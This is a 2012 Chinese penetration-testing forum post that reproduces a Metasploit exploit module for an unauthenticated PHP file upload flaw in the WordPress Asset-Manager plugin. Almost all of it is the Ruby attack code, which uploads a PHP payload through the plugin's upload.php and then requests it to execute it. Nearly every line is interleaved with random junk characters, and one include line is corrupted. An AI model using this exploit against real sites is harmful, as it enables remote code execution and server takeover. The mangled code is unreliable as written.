中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]
作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
% x" X, h' G3 s& J8 Q- _/ G. T+ [( m" T1 h2 S: p' U
##$ N" v/ B0 y8 O# V0 S
# This file is part of the Metasploit Framework and may be subject to$ M1 Q2 l) ^- J- C! ~% j
# redistribution and commercial restrictions. Please see the Metasploit$ w6 F" _/ M4 B" j
# Framework web site for more information on licensing and terms of use.$ W3 y+ r: y; @4 y* V' b" c8 {
#   http://metasploit.com/framework/: N  u  @5 X- K9 H) i
##
. s7 k: ^2 J/ s7 Z; B 8 ]/ H+ P* y) ^' h; c
require 'msf/core'
3 _$ B9 }+ K. `, N' m' P* wrequire 'msf/core/exploit/php_exe'
+ b% X5 `1 e2 g1 \
  z2 u# T; ]: f5 Yclass Metasploit3 < Msf::Exploit::Remote" o( L1 F2 Z) O5 [; t/ B
  Rank = ExcellentRanking$ L$ q) w6 X5 _; i
: s" }  C2 ~( v4 N3 i0 g- L
  include Msf::Exploit::Remote::HttpClient4 T7 [+ _. j; s+ C* `
  include Msf::Exploit:hpEXE
) g6 d+ t6 I" E7 m* l4 |
3 l% P- M, Q( _* E) Z+ C, L  def initialize(info = {})
) i# e! W  W, p4 d4 y7 H    super(update_info(info,
" Q# A7 V0 p! V+ b) I+ [      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
6 \: {, j6 S6 K+ |6 ~      'Description'    => %q{
: J& a' m- ^; a        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
* _) i$ h4 b" v5 `; a9 V+ J        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
( D# K) h# e" W0 _        temp directory without authentication, which results in arbitrary code execution.8 ?6 x; `5 o( \  s$ [" U$ E/ B& N5 i
      },1 A9 V3 O, N$ D# D2 I2 U3 w
      'Author'         =>* |: q5 i9 i1 p: R) `6 m( V
        [% w6 n/ t' g8 S. w/ X
          'Sammy FORGIT', # initial discovery# {+ c% [$ E! U, v1 c  I2 ~1 a* K
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module8 r5 F3 A1 Q  W0 B( s6 {1 t) |
        ],
7 |! e- Q/ U5 f, H1 T      'License'        => MSF_LICENSE,
0 j0 K, A# a, T% y( m4 ]      'References'     =>" Q. k, g9 \; a8 V# A
        [+ C. ~) d4 l* }& [$ L( Y* R1 Q
          [ 'OSVDB', '82653' ],1 ~5 C7 e9 i) D" P4 y
          [ 'BID', '53809' ],- T; q4 N  N+ {" N
          [ 'EDB', '18993' ],
1 G1 K1 F( O4 j% h# |          [ 'URL', 'http:// www.myhack58.com /' ]5 f2 B* {( f3 P
        ],
$ Z  N# }- k/ a7 D" T      'Payload'       =>  R# ]4 P/ E% u7 N4 a+ Y$ O6 y7 f
        {
( O  H* v! K3 |  f2 H( A          'BadChars' => "\x00",. p5 O. T- o0 I( a/ H/ t; D" P
        },& T1 W0 M  I+ a& m8 C
      'Platform'       => 'php',# F, t4 x& A) T2 H0 I0 ?% b
      'Arch'           => ARCH_PHP,
! {9 S4 c" X1 y4 J" \% }9 O      'Targets'        =>! z, u) w  G1 W) W
        [: i7 F# a8 [: n/ e1 o( E
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
9 x' p# G, G: K/ F  M          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
' A$ i# d7 I7 M$ B5 ~$ c        ],3 P' z1 S4 n- t2 F2 X
      'DefaultTarget' => 0,
& V; J& n/ @' |8 }      'DisclosureDate' => 'May 26 2012'))
: E: L6 B% v  H
' w' E. f& X4 t0 `. B: ^( i    register_options(
1 E# X1 X1 I% G+ y1 M3 p) }. k      [
2 X9 j/ N* V0 {9 l& ]5 @; }        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
4 F# _' q% Z5 v      ], self.class)
3 T7 ?  y% |* U% W5 \, \% t+ m  end
9 M9 ~; c+ Y3 a9 U; r. r8 u4 V: E, N3 Q
9 d0 s. x% n. l' u% P  q  def exploit
% @4 u9 b8 o" S! ~* p0 _    uri =  target_uri.path
$ @9 M) @8 |. o/ \    uri << '/' if uri[-1,1] != '/'( {; Y. n$ B$ Z- x6 J
    peer = "#{rhost}:#{rport}"" h4 v9 v. L$ j" I2 H( }# O" u+ Y" Y
    payload_name = "#{rand_text_alpha(5)}.php"1 @) e1 {: J- c: a* B" N5 s
    php_payload = get_write_exec_payload(:unlink_self=>true)0 j: n4 ^  X) q
9 r( E' P  B- o# c6 B& E. ]# C* z5 p
    data = Rex::MIME::Message.new
+ G. @- U7 g5 ~+ m! ^0 H    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
4 D2 n$ X* d2 s! a& M, l    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
- ~+ T4 u' m; R/ o. o0 k* c  a( ~ - `4 F$ U& j  \
    print_status("#{peer} - Uploading payload #{payload_name}")8 ]# @8 s7 z. Z, Z, h, |6 ?: a
    res = send_request_cgi({! c- \+ L3 W  Y( j
      'method'  => 'POST',
6 s& m! T" o2 F/ ~1 q+ A# }8 A      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",& O& F1 F, _1 C" [
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",1 {: Q5 h, g' L, c/ ~* L, p: p# T
      'data'    => post_data6 h  p" b1 a9 y' b7 k
    })8 U$ M. ]' ^9 `8 ^: T# z
1 Z/ V$ x- n1 m6 R5 R
    if not res or res.code != 200 or res.body !~ /#{payload_name}/5 v1 k# m% j" s/ w
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
" [% v* m1 {1 L9 d8 d# C! _. i5 wend: z$ j: K/ I7 ?
. A8 P7 Y4 l. S  K
    print_status("#{peer} - Executing payload #{payload_name}")
6 M7 f3 x& i$ s4 u5 v" q, c    res = send_request_raw({- u4 I' C, H/ T; K8 [
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
, O1 X8 T7 j- l( u, @      'method'  => 'GET'
8 u" N! u) O7 w5 ~, i8 D% b    })
& g4 N' I+ _% D! d7 d1 J. ~5 q  T
. _5 n+ F. G- K4 f- O    if res and res.code != 200# ^! ?6 f& f' W9 U3 H( V
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")) v+ w; c; _7 t3 w7 e% h  C
    end! g5 Y, W7 ]0 z  {/ c$ S3 p; c
  end5 f. f, j2 P, K- e% v
end  u& ^, t! Z' {  t5 t7 R' s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2